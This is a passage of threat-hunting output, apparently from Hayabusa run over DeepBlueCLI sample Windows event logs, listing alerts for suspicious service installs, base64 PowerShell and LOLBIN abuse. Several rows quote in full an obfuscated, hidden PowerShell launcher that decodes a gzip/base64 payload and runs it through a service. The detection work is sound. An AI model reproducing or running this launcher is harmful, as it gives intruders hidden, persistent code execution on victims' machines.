IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:36:09.147 +00:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,"Svc: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:36:09.147 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: zIGuwymOgHZnXZPm | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-19 20:36:09.237 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\cmd.exe | PID: 0x108 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.237 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.237 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.237 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.334 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xd94 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.334 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.334 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.334 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.334 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:09.334 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:10.592 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""powershell.exe"" -nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIADhM4FcCA7VWbW/aSBD+nEr9D1aFhK0QbAhtmkiVbm1ew0sABwhQVG3stVlYex17zVuv//3GgBt6Te7ak85KxK5nZvfZZ57ZsRP7lqDcl4K7JpK+vn1z1sUh9iQ54w7q7PbLIidl1p62iJWzMzBm5pVF8XZXiQfSJ0meoiAocw9Tf3ZzY8RhSHxxmOdrRKAoIt4joySSFelPaTQnIbm4e1wQS0hfpcyXfI3xR8yOblsDW3MiXSDfTmwtbuEEV94MGBVy9vPnrDK9KMzylacYs0jOmttIEC9vM5ZVpG9KsuH9NiBytk2tkEfcEfkR9S+L+YEfYYd0YLUVaRMx53aUVeAo8BcSEYe+9HyoZJWDj5yFYTfkFrLtkEQQkm/4K74kcsaPGctJf8jTI4R+7AvqEbALEvLAJOGKWiTK17FvM9InzkzukHV68l8Nkk+DwKsrQiUHaXkNa5vbMSOH8KzyM9o0nwo833MKPHx7++btGydVAQ4871QFMDqb7scEcMpdHtG93ydJy0lt2AwLHm5hmrkPY6LMpGmShOlsJmWCUjv3engh9QVPYneDDbybDjm1ZxBzTE/maT4ePyyjxPS60srEoT4pb33sUSsVk/wS5cRhZH/MfOrWAWBy9mggdpkw4mKR8JeTpj+HVTwqvsfqMWU2CZEFaYsAFWRU+RHMISVytuG3iQc0HeZZYN8BCZPU+yjbbbp7MgenrMFwFOWkbgw1ZOUkk2BG7JyE/IgeTSgWfD/MPsNtx0xQC0ciXW6mnFB53NLgfiTC2ILkwfHvzYBYFLOEjZxUpzbRtyZ1062zL3JhYMao78JKK8gFvEk4MEUiiRBQJulX8iYRDS9gxAOXfTlXGXaheI/q30sIu8TOvoAx1fZByAkhKRMnCCHLJuMiJw1pKOBiSMjdy+k/ITi5ElIsRkiOKZHTYpnqW5FIPLPQ2h+HYb9hrC4TiR452jMSCmCjGnJPxxH5UDJFCFzJ79Q7aiB4xg2ftS19SQtoTQuNNvwP6GWDl6/s5u2iroblzdxBjajRrnfLvXq9tLo1hyVhVhqi2W2IduVhsTBRvT8Yi0kD1e+pthyXdsEt3ZktZI836oedvltr+ma3cG1nXHYc98ox+4X3VdoaGT1dK+JWuRK3Rvpa10pRha7rPTroLW+r4nE8ZHjgqO5D4RrTTStcDAu8vWsgVJtfWrtbZ1ibt+3tuK5ej0pLVEHI8CvDqs6bYz1EXXWI3SFfNxc1NnINpI/OKZn0BlW916vqaFBbPJWvVRdiH/BcHw2LdBI89OcwrwKEpqqVGjbZ8XEPSKpxhN0++LhG0Zo74FM+R/p5h0dFvNQ50sGnOnkCXOOg2mVgvx8UORqyzgNGrcm2qqqFcbeE6hod1VyULIldvYdRtCrvymphaHN79L4zdtThA7tSy8Z9YDmqqq7r5aY1KWw+3l2VdO3J8KjHHou2ej34qPvrpttduXZvdNXfdLaPsN9AVYfvEvWAfDIu89Zm9f7uy3ZyIonXLvs2DqM5ZiAVuMDTeq3ysHq8jrucJhGyvG/OSxL6hEFHg56X6h0xxq2kL+wvbuhJh04xg5IdwPCy+OJIkb47Ks+tIn11czMBlFBAJ/rOt4jvinlO21xqGlz92qakwZl//YAGD7by6Yq5pIOc8vW3Ddl+QyUpuExgfcBGfL34fyk9lvocfux/o/T53T9Yf4lmLfcDCT9Zf3zxW5z/NgMjTAV4mnBXMXJoni8TcZTRyWdGmiJQiHN8ko++u1hcdOAL5C8TptLHZwoAAA=='));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:10.592 +00:00,IE10Win7,4688,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:10.592 +00:00,IE10Win7,4688,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation_builtin/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:10.592 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:36:10.592 +00:00,IE10Win7,4688,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-19 20:38:04.034 +00:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,"Svc: DrzkXznQhkKgYssd | Path: %COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object 